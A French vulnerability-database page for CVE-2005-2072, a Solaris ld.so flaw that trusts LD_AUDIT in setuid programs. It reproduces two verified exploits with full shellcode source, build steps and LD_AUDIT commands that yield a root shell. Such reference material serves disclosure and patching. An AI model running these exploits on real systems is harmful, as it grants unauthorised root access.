CVE-2005-2072 : Détail

CVE-2005-2072

A01-Broken Access Control
0.05%V3
Local
2005-06-29
02h00 +00:00
2006-05-09
07h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The runtime linker (ld.so) in Solaris 8, 9, and 10 trusts the LD_AUDIT environment variable in setuid or setgid programs, which allows local users to gain privileges by (1) modifying LD_AUDIT to reference malicious code and possibly (2) using a long value for LD_AUDIT.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1073

Date de publication : 2005-06-27 22h00 +00:00
Auteur : Przemyslaw Frasunek
EDB Vérifié : Yes

/* - SunOS 5.10 Generic i86pc i386 i86pc - SunOS 5.9 Generic_112233-12 sun4u It does NOT work on: SunOS 5.8 Generic_117350-02 sun4u sparc Example on unpatched Solaris 10 (AMD64): atari:venglin:~> cat dupa.c */ static char sh[] = "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } /* atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so atari:venglin:~> su # id uid=0(root) gid=10(staff) */ // milw0rm.com [2005-06-28]
Exploit Database EDB-ID : 1074

Date de publication : 2005-06-27 22h00 +00:00
Auteur : Przemyslaw Frasunek
EDB Vérifié : Yes

/* Solaris 9 on SPARC: $ cat dupa.c */ char sh[] = /* setuid() */ "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* execve() */ "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } /* $ gcc -fPIC -shared -o /tmp/dupa.so dupa.c $ export LD_AUDIT=/tmp/dupa.so $ ping # id uid=0(root) gid=100(student) */ // milw0rm.com [2005-06-28]

Products Mentioned

Configuraton 0

Sun>>Solaris >> Version 8.0

    Sun>>Solaris >> Version 9.0

      Sun>>Solaris >> Version 9.0

        Sun>>Solaris >> Version 10.0

          Sun>>Sunos >> Version 5.8

          Références

          http://www.vupen.com/english/advisories/2005/0908
          Tags : vdb-entry, x_refsource_VUPEN
          http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1
          Tags : vendor-advisory, x_refsource_SUNALERT
          http://securitytracker.com/id?1014537
          Tags : vdb-entry, x_refsource_SECTRACK
          http://secunia.com/advisories/15841
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/bid/14074
          Tags : vdb-entry, x_refsource_BID